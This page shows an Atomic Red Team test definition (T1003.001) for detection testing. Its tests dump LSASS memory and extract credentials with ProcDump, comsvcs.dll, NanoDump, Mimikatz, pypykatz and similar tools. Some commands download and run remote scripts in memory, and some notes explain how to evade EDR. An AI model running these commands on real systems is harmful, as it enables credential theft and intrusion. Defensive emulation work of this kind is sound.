Create Mini Dump of LSASS.exe using ProcDump
Product information
Updated
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
MITRE ATT&CK® techniques
Summary
- Source control
- redcanaryco/atomic-red-team
- Status
- Synced
- File path
- atomics/T1003.001/T1003.001.yaml
- Due date
Activity
created atomics/T1003.001/T1003.001.yaml
Raw rule
attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
executor:
command: |
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
supported_platforms:
- windows
executor:
command: |
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
cleanup_command: |
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
supported_platforms:
- windows
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
- description: |
Dumpert executable must exist on disk at specified location (#{dumpert_exe})
prereq_command: |
if (Test-Path "#{dumpert_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}"
executor:
command: |
"#{dumpert_exe}"
cleanup_command: |
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
prereq_command: |
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
executor:
command: |
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
cleanup_command: |
del "%temp%\nanodump.dmp" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the Lsass dump
type: path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
prereq_command: |
if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path "#{mimikatz_exe}" | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
- description: |
Lsass dump must exist at specified location (#{input_file})
prereq_command: |
cmd /c "if not exist #{input_file} (exit /b 1)"
get_prereq_command: |
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
executor:
command: |
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
description: |
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
supported_platforms:
- windows
input_arguments:
venv_path:
description: Path to the folder for the tactics venv
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
- description: |
Computer must have venv configured at #{venv_path}
prereq_command: |
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
get_prereq_command: |
py -m venv "#{venv_path}"
- description: |
pypykatz must be installed
prereq_command: |
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
executor:
command: |
"#{venv_path}\Scripts\pypykatz" live lsa
cleanup_command: |
del "%temp%\nanodump.dmp" > nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
executor:
command: |
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with createdump.exe from .Net v5
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
.Net v5 must be installed
prereq_command: |
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
get_prereq_command: |
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
executor:
command: |
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
cleanup_command: |
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
supported_platforms:
- windows
input_arguments:
xordump_exe:
description: Path to xordump
type: path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
Computer must have xordump.exe
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using lolbin rdrleakdiag.exe
auto_generated_guid: 47a539d1-61b9-4364-bf49-a68bc2a95ef0
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks.
This can be achieved with lolbin rdrleakdiag.exe.
Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
supported_platforms:
- windows
executor:
command: |
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
cleanup_command: |
Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory through Silent Process Exit
auto_generated_guid: eb5adf16-b601-4926-bca7-dad22adffb37
description: |
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
specific actions for a monitored process in one of two scenarios; either the process terminates
itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API.
The major advantage of this technique is that it does not cause lsass.exe to crash, and since
WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides
the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process,
from an attacker standpoint this is appealing as their illicit credential extraction will
appear benign because from a defender’s viewpoint it’s within the realm of normal activity.
Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
supported_platforms:
- windows
input_arguments:
output_folder:
description: Folder Path where resulting dump should be placed
type: path
default: '%temp%\SilentProcessExit'
dependency_executor_name: powershell
dependencies:
- description: |
NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
prereq_command: |
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
executor:
command: |
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
cleanup_command: |
rmdir "#{output_folder}" /s /q >nul 2> nul
name: command_prompt
elevation_required: true